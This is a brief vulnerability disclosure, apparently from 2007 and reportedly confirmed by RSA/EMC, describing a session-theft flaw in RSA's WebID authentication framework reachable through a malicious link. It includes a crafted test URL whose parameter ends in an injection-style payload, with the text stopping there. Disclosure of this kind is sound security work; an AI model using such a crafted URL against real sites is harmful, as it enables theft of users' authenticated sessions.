The following security report has been sent to RSA/EMC on the 2/10/2007 and confirmed by them. RSA took action to alert their customers. ----------------------------------------- *Description* The WebID authentication framework suffers from a flow allowing to steal an authenticated users's session if he is enticed into clicking a malicous link. TEST URL : https://www.yournamehere.com/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&authntype=2&username=a&passcode=a&postdata=aaa"%20>